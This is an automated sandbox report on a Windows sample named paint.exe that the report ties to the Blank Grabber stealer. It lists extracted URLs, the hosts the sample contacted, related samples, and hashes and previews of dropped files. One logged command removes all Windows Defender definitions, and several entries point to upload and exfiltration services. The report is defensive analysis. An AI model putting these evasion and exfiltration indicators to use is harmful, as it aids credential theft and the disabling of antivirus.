https://www.ifeng.com/	paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmp	false		high
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings	paint.exe, 00000001.00000002.2011696050.00000207724C0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	paint.exe, 00000001.00000003.1915866896.0000020771B0A000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1917249999.0000020771D1C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	paint.exe, 00000001.00000003.1916705724.0000020771B88000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.rfc-editor.org/rfc/rfc8259#section-8.1	paint.exe, 00000001.00000002.2009946233.0000020771B9C000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1782235643.0000020771B9E000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1711530938.0000020771B91000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.2004727333.0000020771B91000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1711380871.00000207714F1000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1725063677.0000020771BA0000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1734071594.0000020771B9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 0000002F.00000002.1831220495.000001B38C51B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://oneget.orgX	powershell.exe, 0000002F.00000002.1831220495.000001B38C1B4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.gofile.io/getServer	paint.exe, 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmp	false		high
https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png	paint.exe, 00000001.00000002.2008427127.0000020771390000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nuget.org/NuGet.exe	powershell.exe, 0000000C.00000002.1893410367.0000019D90074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.1886205095.000001B39AC2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.1886205095.000001B39AD6D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.1831220495.000001B38C51B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	powershell.exe, 0000002F.00000002.1831220495.000001B38C1B4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sectigo.com/CPS0	paint.exe, 00000000.00000003.1673052282.0000023393142000.00000004.00000020.00020000.00000000.sdmp	false		high
http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/	paint.exe, 00000001.00000003.2005215252.00000207714D8000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1781102686.00000207714D3000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1919791436.00000207714D8000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1712152844.00000207714D1000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States		53334	TUT-ASUS	false
162.159.137.232	discord.com	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1584382
Start date and time:	2025-01-05 10:15:12 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 6s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	112
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	paint.exe
Detection:	MAL
Classification:	mal100.rans.troj.adwa.spyw.expl.evad.winEXE@177/96@2/2
EGA Information:	Successful, ratio: 50%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
Excluded IPs from analysis (whitelisted): 142.250.184.195, 20.12.23.50, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, gstatic.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target mshta.exe, PID 6492 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 1780 because it is empty
Execution Graph export aborted for target powershell.exe, PID 8364 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
04:16:09	API Interceptor	133x Sleep call for process: powershell.exe modified
04:16:10	API Interceptor	5x Sleep call for process: WMIC.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	X9g8L63QGs.exe	Get hash	malicious	Blank Grabber	Browse	ip-api.com/json/?fields=225545
	KpHYfxnJs6.exe	Get hash	malicious	Blank Grabber	Browse	ip-api.com/json/?fields=225545
	9g9LZNE4bH.exe	Get hash	malicious	Blank Grabber	Browse	ip-api.com/json/?fields=225545
	riFSkYVMKB.exe	Get hash	malicious	Blank Grabber	Browse	ip-api.com/json/?fields=225545
	ddos tool.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	kthiokadjg.exe	Get hash	malicious	Blackshades	Browse	ip-api.com/json/
	file.exe	Get hash	malicious	AsyncRAT, XRed, XWorm	Browse	ip-api.com/line/?fields=hosting
	file.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	file.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	23khy505ab.exe	Get hash	malicious	Njrat	Browse	ip-api.com/line/?fields=hosting
162.159.137.232	hkMUtKbCqV.exe	Get hash	malicious	Unknown	Browse
	X9g8L63QGs.exe	Get hash	malicious	Blank Grabber	Browse
	KpHYfxnJs6.exe	Get hash	malicious	Blank Grabber	Browse
	9g9LZNE4bH.exe	Get hash	malicious	Blank Grabber	Browse
	rename_me_before.exe	Get hash	malicious	Python Stealer, Exela Stealer	Browse
	arm.elf	Get hash	malicious	Unknown	Browse
	Bloxflip Predictor.exe	Get hash	malicious	Njrat	Browse
	phost.exe	Get hash	malicious	Blank Grabber	Browse
	WE8zqotCFj.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse
	EsgeCzT4do.exe	Get hash	malicious	XWorm	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
discord.com	hkMUtKbCqV.exe	Get hash	malicious	Unknown	Browse	162.159.137.232
	X9g8L63QGs.exe	Get hash	malicious	Blank Grabber	Browse	162.159.137.232
	KpHYfxnJs6.exe	Get hash	malicious	Blank Grabber	Browse	162.159.137.232
	9g9LZNE4bH.exe	Get hash	malicious	Blank Grabber	Browse	162.159.137.232
	riFSkYVMKB.exe	Get hash	malicious	Blank Grabber	Browse	162.159.138.232
	AimStar.exe	Get hash	malicious	Blank Grabber	Browse	162.159.128.233
	rename_me_before.exe	Get hash	malicious	Python Stealer, Exela Stealer	Browse	162.159.137.232
	Fizzy Loader.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	162.159.138.232
	Jx6bD8nM4qW9sL3v.exe	Get hash	malicious	Unknown	Browse	162.159.128.233
	dsoft.exe	Get hash	malicious	Python Stealer, Creal Stealer	Browse	162.159.138.232
ip-api.com	X9g8L63QGs.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1
	KpHYfxnJs6.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1
	9g9LZNE4bH.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1
	riFSkYVMKB.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1
	ddos tool.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	kthiokadjg.exe	Get hash	malicious	Blackshades	Browse	208.95.112.1
	file.exe	Get hash	malicious	AsyncRAT, XRed, XWorm	Browse	208.95.112.1
	file.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	file.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	23khy505ab.exe	Get hash	malicious	Njrat	Browse	208.95.112.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	K27Yg4V48M.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	hkMUtKbCqV.exe	Get hash	malicious	Unknown	Browse	162.159.135.234
	IH5XqCdf06.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	3LcZO15oTC.exe	Get hash	malicious	Unknown	Browse	104.21.43.44
	3jL3mqtjCn.exe	Get hash	malicious	LummaC	Browse	104.21.48.1
	3LcZO15oTC.exe	Get hash	malicious	Unknown	Browse	172.67.219.93
	elyho3x5zz.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe	Get hash	malicious	Remcos	Browse	172.64.41.3
	elyho3x5zz.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	Tax_Refund_Claim_2024_Australian_Taxation_Office.js	Get hash	malicious	Remcos	Browse	172.64.41.3
TUT-ASUS	X9g8L63QGs.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1
	KpHYfxnJs6.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1
	9g9LZNE4bH.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1
	riFSkYVMKB.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1
	ddos tool.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	kthiokadjg.exe	Get hash	malicious	Blackshades	Browse	208.95.112.1
	file.exe	Get hash	malicious	AsyncRAT, XRed, XWorm	Browse	208.95.112.1
	file.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	file.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	23khy505ab.exe	Get hash	malicious	Njrat	Browse	208.95.112.1

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\_MEI67162\VCRUNTIME140.dll	3LcZO15oTC.exe	Get hash	malicious	Unknown	Browse
	X9g8L63QGs.exe	Get hash	malicious	Blank Grabber	Browse
	riFSkYVMKB.exe	Get hash	malicious	Blank Grabber	Browse
	mcgen.exe	Get hash	malicious	Blank Grabber	Browse
	AimStar.exe	Get hash	malicious	Blank Grabber	Browse
	DChOtFdp9T.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse
	user.exe	Get hash	malicious	Unknown	Browse
	HX Design.exe	Get hash	malicious	Python Stealer, Blank Grabber	Browse
	YgJ5inWPQO.exe	Get hash	malicious	AsyncRAT, XWorm	Browse
	wp-s2.exe	Get hash	malicious	Python BackDoor	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\?? ? ?? \Display (1).png

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	691200
Entropy (8bit):	7.923948857852395
Encrypted:	false
SSDEEP:	12288:2U9YNlrsDAL0YlKCsI4jx/NmRnuMRCyzEi43Mtw433pmYLRP0nnpchxn:2f7r6AL0cP3WlU3RCyzs3Mtw4Hp3REn2
MD5:	53691E369A8F41115B60591F8EEC6450
SHA1:	DC92A89E20093C1C9FF561F3118C375545B87CC9
SHA-256:	80FACFFFE42F25CC0B2B5DB533CB9AA74571CEEC7F971FA392994CCDFD6FCCC3
SHA-512:	0BF747879CEBFF6D5FB9547DBDC5BC80FB20A9A4BE1447FAB1DEA07374C762910B6397FCB4FBDC615B6A8692929C56A72A26B33C3F4B8553BDDBFD783D7F682F
Malicious:	false
Preview:	.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..w.mU....v..I.s.w..XU......X...ZQe..Rr...d.`.....lD%H.1.XGK).$.U6.$... ...c......ko.[{Z...o.c......>F.s./...l...C.;%...O{..tO..:'.{X`.t.4:.....N.y/..C....&.\|..L.?M.........Wl.h.q.~ant>..91ulL.sO...yb..Y..HL.-..H........=.#.....5...k...4.C....CfO....L...?..S.yx~9....c1U....s....[.}.j........2.1..@..i.Y..#..L}.........5.?........<.E.S........E.S.Mys.....,z.`..'.Wj..u.@..3f..wd...fj..{ ...wf....+........"c.m.N.[Z........]us....j.[n....e....93..rK...a.P..%)O0f..>7V.7'...Z..S\|Q.k.T._.w..}R<...i......h<...ml..o......j.....K.=......{]_-yS..3..b.t....v....zM.....'..M..RLcA>.=o....e.]B,...%/.;;].../J.tw....J.-!..w..Z.k.....NWe.;^...qC.l..o.{...]....;\Yu.."..vL......./..;\...........%.\.Y.s.n....c~Y..K.._.....X..;...K{n.Y.10...).].O.?..%.E.^...=..h..3e...m.[..oui5..%..t.t..b.-.n.}.>,.&.k}.^..].MZ.u...O...Ly._\-."]7..)O.g..[.m..S...w6...nvQ..lza.)W..Z..z.

C:\Users\user\AppData\Local\Temp\MpCmdRun.log

Download File

Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	modified
Size (bytes):	894
Entropy (8bit):	3.11769109741974
Encrypted:	false
SSDEEP:	12:Q58KRBubdpkoPAGdjrZyL0k9+MlWlLehW51IC4yLt:QOaqdmOFdjrYL3+kWResLIgLt
MD5:	CE6C6BBAB057B06F5776C174968B886A
SHA1:	F9660C147A3A03F12D5909AD3F0D5F4EADB0C38A
SHA-256:	D786494399049C16BCB43457F60DE611D654895DF7BFBB715885D5ED4F4B4B9C
SHA-512:	BBF1F70A4F307EDE89D01DE4325D48A779E5667F0627740698D6A4314BE70F45A82AFC209465A1C5ED568BA090D1E075B62F3FF70607D30757DD36EBE1E14157
Malicious:	false
Preview:	..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.M.p.C.m.d.R.u.n...e.x.e.". . .-.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s. .-.A.l.l..... .S.t.a.r.t. .T.i.m.e.:. .. S.u.n. .. J.a.n. .. 0.5. .. 2.0.2.5. .0.4.:.1.6.:.2.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....S.t.a.r.t.:. .M.p.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s.(.1.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. S.u.n. .. J.a.n. .. 0.5. .. 2.0.2.5. .0.4.:.1.6.:.2.9.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....

C:\Users\user\AppData\Local\Temp\RES7663.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b6, 9 symbols, created Sun Jan 5 10:41:09 2025, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1372
Entropy (8bit):	4.113327991844016
Encrypted:	false
SSDEEP:	24:H9Fq9s+fUjE2UDfHzwKefmhNII+ycuZhNMakS4PNnqS+d:dg0E2SkKCmhu1ulMa3AqSe
MD5:	2A7D0C45145D7ECC57244C0BF4F1A60A
SHA1:	5AC93E3F32500709AFA9F15ED4A3CAEF86204F44
SHA-256:	9A8B5431815D4C1C6562ABBD77F4F4DB717EBEB5E59A7C09ED255C699B10B1B9
SHA-512:	E7637463F92529458260301BD4A2AB10D87CE73074EC60E85D9E3A727166477DCB35FD1DB0360DD49AAE7E8AED82A8935D6EE697BF0AEF6133DA9B2707FEA517
Malicious:	false
Preview:	L....azg.............debug$S........x...................@..B.rsrc$01........X.......\...........@..@.rsrc$02........P...f...............@..@........T....c:\Users\user\AppData\Local\Temp\u3oq5ojt\CSCF0203E537737442CADEFC214ABE2ED32.TMP................M@D.:"...l}5.j...........4.......C:\Users\user\AppData\Local\Temp\RES7663.tmp.-.<....................a..Microsoft (R) CVTRES...=..cwd.C:\Users\user\AppData\Local\Temp\...........exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...u.3.o.q.5.o.j.t...d.l.l.....(.....L.e.g.a.

C:\Users\user\AppData\Local\Temp\S7zJV.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe
File Type:	RAR archive data, v5
Category:	dropped
Size (bytes):	726718
Entropy (8bit):	7.99972638285817
Encrypted:	true
SSDEEP:	12288:3jPmxlfz7REdv2V5jYBeOAijPkN37sMbUF2Tm9wmU5sito1MruPISMFqiY:3jPmxl77R+458BeO5TkNYMbU2K9466oj
MD5:	C0CE07799E5B7B69F59DE6D7362400A7
SHA1:	9D425FC856D2CD880E3E5FBAF6B16B8A471E8A55
SHA-256:	FD8CF022454CD470B564459496DC0E4F44F651B60C01EE1BF92FFF1E773DC882
SHA-512:	4762BCB5A8FAD8075259919A48D5EB3F3B76D772037F0A9A2DAC1AD49B80F536DC9AC606B07C71DDD635C7DC84B2322F99A6A13591F7C29B60310349F2187725
Malicious:	true
Preview:	Rar!........!.....b..}.....8..6.X...)...+...;..\|._ToI....N.B.h.wck(.}.G.l...[..BT.........2b..L...27.. ..}...P.zjP...V.W....F......Yb.C.#t\|.)1(.\S..zIw.HB#..Ns.p.........Zh.&ST.2G.!K......G1.T..k.9....g.b..N..>.y....'g..^n.v....<6._..dV.`..".N..u_'A~.-.$^..p.%-........y...-........P".a.}...XQ.1$2.N....?....#..k.>....b.~O..._o....l1O.......wh..O.=.>.m..Q...0..b...2..:kI.....h.... ..ee..Q..w.V([.F..d....l"...:.R.It..J...,...2LW.'.v.....cp../..FY..y..<.j ...........8u..L....aiU.I0l....8.2....+,$.4...;....U...aO...b..P..6..B ..c...Si..I..t.j.4e....I..8&...U...z-$CZ3~..g..`..:F.Vq3.4.....eB.x8l/j. ~..8}.w...wJ->.....t..2.z.K)v..&.y?^.b...l\|I....?~..Ds.M.z.....m.zP..&............wh......HG.... .........U..,O..V.\|.Y\|R3.7Od..#x..-:.+).>..,y.z..*Y.e...W..pOG-...&...\|}+..f1.n.L.H[..#...<..\.z}.'.....6>x...R..W...8...Ki<.FIqh.....jF.g".^%..e...-.F....@["o.2...Nz.l.r\.bR..].).~u.k0........%.l.E.+...M...g%.&...@.......,..s$'(.p$g.m.`k`...?.....d....t.

C:\Users\user\AppData\Local\Temp\_MEI67162\VCRUNTIME140.dll

Download File

Process:	C:\Users\user\Desktop\paint.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	120400
Entropy (8bit):	6.6017475353076716
Encrypted:	false
SSDEEP:	1536:N9TXF5LLXQLlNycKW+D4SdqJk6aN1ACuyxLiyazYaCVoecbdhgOwAd+zfZ1zu:N9jelDoD9uyxLizzFzecbdPwA87S
MD5:	862F820C3251E4CA6FC0AC00E4092239
SHA1:	EF96D84B253041B090C243594F90938E9A487A9A
SHA-256:	36585912E5EAF83BA9FEA0631534F690CCDC2D7BA91537166FE53E56C221E153
SHA-512:	2F8A0F11BCCC3A8CB99637DEEDA0158240DF0885A230F38BB7F21257C659F05646C6B61E993F87E0877F6BA06B347DDD1FC45D5C44BC4E309EF75ED882B82E4E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 3LcZO15oTC.exe, Detection: malicious, Browse Filename: X9g8L63QGs.exe, Detection: malicious, Browse Filename: riFSkYVMKB.exe, Detection: malicious, Browse Filename: mcgen.exe, Detection: malicious, Browse Filename: AimStar.exe, Detection: malicious, Browse Filename: DChOtFdp9T.exe, Detection: malicious, Browse Filename: user.exe, Detection: malicious, Browse Filename: HX Design.exe, Detection: malicious, Browse Filename: YgJ5inWPQO.exe, Detection: malicious, Browse Filename: wp-s2.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\=..\...\...\..S$...\...$...\...\..5\...\...\.....\.....\.....\.....\......\.....\..Rich.\..........PE..d.....x.........." ...).$...d............................................................`A........................................0u..4...d}..........................PP...........^..p............................\..@............@...............................text............................... ..`fothk........0...................... ..`.rdata...C...@...D...(..............@..@.data................l..............@....pdata...............p..............@..@_RDATA...............\|..............@..@.rsrc................~..............@..@.reloc..............................@..B................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67162\_bz2.pyd

Download File

Process:	C:\Users\user\Desktop\paint.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	51944
Entropy (8bit):	7.767101046633284
Encrypted:	false
SSDEEP:	1536:ozTAsFl1R2u75vp+qCOLcI+CVYkyUzR9pfI/KYF:oztl1R2uDQXI+CVYfb
MD5:	7727659BB076D34CF0F0AD1C1FC968E6
SHA1:	5D91194BBE6D8CAF5EAFDE938A8D364377B53851
SHA-256:	B9A2152A844FB58FB294DC33EFD3BD2C266DEF470BFE4B4EDACFB75DD2E3ECED
SHA-512:	AB4AD49CFF143A40C408828E18EA095C2733667EA27E8BBFC4CFA05D433D4C0F8DE64B217021B62BCBEF538B0D8912A98F53669AF3D49ACBA01E31DE6FA4A8C2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W.....@...@...@.......@...A...@.......@...C...@...D...@...E...@..A...@.a.A...@...A.L.@..M...@..@...@......@..B...@.Rich..@.........PE..d....\Og.........." ...*.............e....................................................`.............................................H.................... ..,...................................................q..@...........................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI67162\_ctypes.pyd

Download File

Process:	C:\Users\user\Desktop\paint.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	62696
Entropy (8bit):	7.818501056461699
Encrypted:	false
SSDEEP:	1536:yZ6c3MDFbKb0SYFcRXUP3i9Hi2DMszWI+LPIcyUzR9hkfI/KI6BO:3c3M5bWjU3iF+s6I+LPIeaO
MD5:	9527B566DDA0B94F93F6DEF63BAAC6BB
SHA1:	FEE229EC97AC282C9ABDE88216EF29096B1B4376
SHA-256:	456C82D5B49AF25839A62E933794DFEC3D2AFDEF10D23A81FAD94B53B488FCC0
SHA-512:	D2D1A9D5A4CBDF98B40354366B95E4DFB84A42E6A093E4E402FEF5652CEAAF79A0EB80D47BAD99CCF202BACA365739108110AA2B14A82664B794A3490FE16193
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\.Z...4...4...4.......4..~5...4..~7...4..~0...4..~1...4..~5...4.jy0...4.jy5...4..5...4...5...4..~9...4..~4...4..~...4..~6...4.Rich..4.................PE..d....\Og.........." ...*.....................................................P............`.........................................HL.......I.......@.......................L.......................................:..@...........................................UPX0....................................UPX1................................@....rsrc........@......................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI67162\_decimal.pyd

Download File

Process:	C:\Users\user\Desktop\paint.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	111984
Entropy (8bit):	7.921858340581511
Encrypted:	false
SSDEEP:	3072:qMU59D5x2XOeajAzXgjNiJluK0uEw/eJ5clHI+OqOb5DVVh:H29Db02jA0jYJluotmJOybTVh
MD5:	0E2118A943A97B74D428204818210403
SHA1:	ABFE4CAD38A66A6FF448AF946CF7250B8B506A2D
SHA-256:	BA390B3078A848F0254548FCB5BEF8441DBBCB36467F9C6D9D18DACF92A18DED
SHA-512:	E21ABBAAF27CC19D386EA8B23117420D3A94E4380C900BD7528972FC9FC763F271C3313431B4EF9B5C336E9CDF0631C0780C2BAC4B209EA14C9F2E53710C7DE7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\|LVT8-8.8-8.8-8.1U..6-8.).9.:-8.).;.<-8.).<.0-8.).=.5-8...9.;-8.J.9.:-8.8-9..-8...;.9-8...5.7-8...8.9-8.....9-8...:.9-8.Rich8-8.................PE..d....\Og.........." ...*.p...................................................0............`..........................................,..P....)....... ...........&...........-..........................................@...........................................UPX0....................................UPX1.....p.......l..................@....rsrc........ .......p..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI67162\_hashlib.pyd

Download File

Process:	C:\Users\user\Desktop\paint.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	37880
Entropy (8bit):	7.650374380736981
Encrypted:	false
SSDEEP:	768:IbKdUeBIro4srako2pWjnI+OIVgFJyUFRYT2Ip44Cxf1mlzzn:IG9WsrRGjnI+OIVgPyUzR9pfIPn
MD5:	69DA0E0688C8D2B1B6801E63053C3412
SHA1:	85AA9A8A26BF71A923D80690B8C2F9D666A65009
SHA-256:	12332EB2C681511BC99BFF5A9B14D935933585199F10E57C0F37EBDAA6519ECE
SHA-512:	5AF791409CE722B656775660700048D63DD26055280FE465ADC1C53A44071657EF4F036CADB058A65A1E4F57B9DCEBA431A3BD679C65CA3ABE8A80AE004D160F
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......f.&@".H.".H.".H.+...&.H.3.I. .H.3.K.!.H.3.L..H.3.M...H...I. .H.P.I. .H.7.I.!.H.".I...H...E.#.H...H.#.H.....#.H...J.#.H.Rich".H.........PE..d....\Og.........." ....P...........!.......................................@............`.........................................\|;..P....9.......0.......................;.......................................-..@...........................................UPX0....................................UPX1.....P.......P..................@....rsrc........0.......T..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI67162\_lzma.pyd

Download File

Process:	C:\Users\user\Desktop\paint.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	90480
Entropy (8bit):	7.909526190238606
Encrypted:	false
